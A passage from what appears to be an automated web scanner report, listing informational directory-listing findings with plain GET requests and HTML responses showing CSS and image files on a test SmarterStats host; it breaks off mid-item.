   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Stats/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 50 <A href="Overrides.css">Overrides.css</A>
Thursday, October 07, 2010 01:00 PM 677 <A href="Overview.css">Overview.css</A>
Thursday, October 07, 2010 01:00 PM 412 <A href="ReportProgress.css">ReportProgress.css</A>
Thursday, October 07, 2010 01:00 PM 1,220 <A href="Sidebar.css">Sidebar.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.21. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Track/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Track/

Request

GET /App_Themes/Default/CSS/Track/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:31 GMT
Content-Length: 1925
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Track/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Track/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 959 <A href="Buttons.css">Buttons.css</A>
Thursday, October 07, 2010 01:00 PM 5,668 <A href="Chats.css">Chats.css</A>
Thursday, October 07, 2010 01:00 PM 1,485 <A href="Compose.css">Compose.css</A>
Thursday, October 07, 2010 01:00 PM 1,246 <A href="Controls.css">Controls.css</A>
Thursday, October 07, 2010 01:00 PM 73 <A href="Editor.css">Editor.css</A>
Thursday, October 07, 2010 01:00 PM 1,410 <A href="Sidebar.css">Sidebar.css</A>
Thursday, October 07, 2010 01:00 PM 5,548 <A href="Viewer.css">Viewer.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.22. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Wizard/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/CSS/Wizard/

Request

GET /App_Themes/Default/CSS/Wizard/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:32 GMT
Content-Length: 1476
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Wizard/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/CSS/Wizard/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 68 <A href="Buttons.css">Buttons.css</A>
Thursday, October 07, 2010 01:00 PM 1,234 <A href="Wizard.css">Wizard.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.23. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/

Request

GET /App_Themes/Default/Controls/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:00 GMT
Content-Length: 2174
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Calendar/">Calendar</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Combobox/">Combobox</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Common/">Common</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Editor/">Editor</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Grid/">Grid</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Input/">Input</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Spell/">Spell</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="TabStrip/">TabStrip</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Toolbar/">Toolbar</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Window/">Window</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.24. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Calendar/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Calendar/

Request

GET /App_Themes/Default/Controls/Calendar/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:02 GMT
Content-Length: 1490
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Calendar/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Calendar/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 6,296 <A href="Calendar.css">Calendar.css</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Img/">Img</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.25. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Calendar/Img/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Calendar/Img/

Request

GET /App_Themes/Default/Controls/Calendar/Img/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Calendar/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:03 GMT
Content-Length: 2758
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Calendar/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Calendar/Img/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/Calendar/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 981 <A href="arrowLeft.gif">arrowLeft.gif</A>
Thursday, October 07, 2010 01:00 PM 972 <A href="arrowLeftHover.gif">arrowLeftHover.gif</A>
Thursday, October 07, 2010 01:00 PM 982 <A href="arrowRight.gif">arrowRight.gif</A>
Thursday, October 07, 2010 01:00 PM 973 <A href="arrowRightHover.gif">arrowRightHover.gif</A>
Thursday, October 07, 2010 01:00 PM 814 <A href="calendarBg.gif">calendarBg.gif</A>
Thursday, October 07, 2010 01:00 PM 404 <A href="datePickerPopup.gif">datePickerPopup.gif</A>
Thursday, October 07, 2010 01:00 PM 625 <A href="datePickerPopupHover.gif">datePickerPopupHover.gif</A>
Thursday, October 07, 2010 01:00 PM 269 <A href="DaysOfWeek.gif">DaysOfWeek.gif</A>
Thursday, October 07, 2010 01:00 PM 995 <A href="fastNavLeft.gif">fastNavLeft.gif</A>
Thursday, October 07, 2010 01:00 PM 986 <A href="fastNavLeftHover.gif">fastNavLeftHover.gif</A>
Thursday, October 07, 2010 01:00 PM 993 <A href="fastnavright.gif">fastnavright.gif</A>
Thursday, October 07, 2010 01:00 PM 986 <A href="fastNavRightHover.gif">fastNavRightHover.gif</A>
Thursday, October 07, 2010 01:00 PM 100 <A href="hoverBg.gif">hoverBg.gif</A>
Thursday, October 07, 2010 01:00 PM 155 <A href="selectBg.gif">selectBg.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.26. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Combobox/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Combobox/

Request

GET /App_Themes/Default/Controls/Combobox/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:05 GMT
Content-Length: 1402
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Combobox/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Combobox/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 5,050 <A href="Combo.css">Combo.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.27. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Common/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Common/

Request

GET /App_Themes/Default/Controls/Common/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:05 GMT
Content-Length: 1507
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Common/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Common/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 14,786 <A href="DialogBase.css">DialogBase.css</A>
Thursday, October 07, 2010 01:00 PM 10,092 <A href="FileManager.css">FileManager.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.28. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Editor/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Editor/

Request

GET /App_Themes/Default/Controls/Editor/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:03 GMT
Content-Length: 1876
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Editor/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Editor/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 358 <A href="Dialogs.css">Dialogs.css</A>
Thursday, October 07, 2010 01:00 PM 12,414 <A href="Editor.css">Editor.css</A>
Thursday, October 07, 2010 01:00 PM 27,830 <A href="EditorBase.css">EditorBase.css</A>
Thursday, October 07, 2010 01:00 PM 1,112 <A href="EditorContentArea.css">EditorContentArea.css</A>
Thursday, October 07, 2010 01:00 PM 335 <A href="EditorIE6.css">EditorIE6.css</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Img/">Img</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.29. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Editor/Img/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Editor/Img/

Request

GET /App_Themes/Default/Controls/Editor/Img/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Editor/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:04 GMT
Content-Length: 4051
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Editor/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Editor/Img/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/Editor/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 127 <A href="ButtonHover_Horizontal.gif">ButtonHover_Horizontal.gif</A>
Thursday, October 07, 2010 01:00 PM 484 <A href="ButtonHover_Vertical.gif">ButtonHover_Vertical.gif</A>
Thursday, October 07, 2010 01:00 PM 149 <A href="ButtonOn_Horizontal.gif">ButtonOn_Horizontal.gif</A>
Thursday, October 07, 2010 01:00 PM 443 <A href="ButtonOn_Vertical.gif">ButtonOn_Vertical.gif</A>
Thursday, October 07, 2010 01:00 PM 143 <A href="ComboArrow.gif">ComboArrow.gif</A>
Thursday, October 07, 2010 01:00 PM 36,404 <A href="CommandSpritesLight.png">CommandSpritesLight.png</A>
Thursday, October 07, 2010 01:00 PM 17,913 <A href="CommandSpritesLightIE6.gif">CommandSpritesLightIE6.gif</A>
Thursday, October 07, 2010 01:00 PM 3,057 <A href="CommonIcons.gif">CommonIcons.gif</A>
Thursday, October 07, 2010 01:00 PM 6,344 <A href="FileExplorerToolbarSprites.png">FileExplorerToolbarSprites.png</A>
Thursday, October 07, 2010 01:00 PM 3,698 <A href="FileExplorerToolbarSpritesIE6.gif">FileExplorerToolbarSpritesIE6.gif</A>
Thursday, October 07, 2010 01:00 PM 11,589 <A href="FileExtensionSprites.png">FileExtensionSprites.png</A>
Thursday, October 07, 2010 01:00 PM 9,244 <A href="FileExtensionSpritesIE6.gif">FileExtensionSpritesIE6.gif</A>
Thursday, October 07, 2010 01:00 PM 520 <A href="FormatStripperSprites.gif">FormatStripperSprites.gif</A>
Thursday, October 07, 2010 01:00 PM 207 <A href="GripHandle_Horizontal_Left.gif">GripHandle_Horizontal_Left.gif</A>
Thursday, October 07, 2010 01:00 PM 207 <A href="GripHandle_Horizontal_Right.gif">GripHandle_Horizontal_Right.gif</A>
Thursday, October 07, 2010 01:00 PM 518 <A href="GripHandle_Vertical_Left.gif">GripHandle_Vertical_Left.gif</A>
Thursday, October 07, 2010 01:00 PM 518 <A href="GripHandle_Vertical_Right.gif">GripHandle_Vertical_Right.gif</A>
Thursday, October 07, 2010 01:00 PM 2,392 <A href="InsertFormElementSprites.gif">InsertFormElementSprites.gif</A>
Thursday, October 07, 2010 01:00 PM 46 <A href="SplitButtonArrow.gif">SplitButtonArrow.gif</A>
Thursday, October 07, 2010 01:00 PM 198 <A href="ToolbarBgr_Horizontal.gif">ToolbarBgr_Horizontal.gif</A>
Thursday, October 07, 2010 01:00 PM 502 <A href="ToolbarBgr_Vertical.gif">ToolbarBgr_Vertical.gif</A>
Thursday, October 07, 2010 01:00 PM 3,601 <A href="ToolBarSprites.gif">ToolBarSprites.gif</A>
Thursday, October 07, 2010 01:00 PM 3,704 <A href="ToolbarVerticalSprites.gif">ToolbarVerticalSprites.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.30. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Grid/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Grid/

Request

GET /App_Themes/Default/Controls/Grid/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:06 GMT
Content-Length: 1485
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Grid/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Grid/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 15,603 <A href="Grid.css">Grid.css</A>
Thursday, October 07, 2010 01:00 PM 13 <A href="GridBase.css">GridBase.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.31. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Input/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Input/

Request

GET /App_Themes/Default/Controls/Input/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:08 GMT
Content-Length: 1398
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Input/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Input/</i> </h2></span>

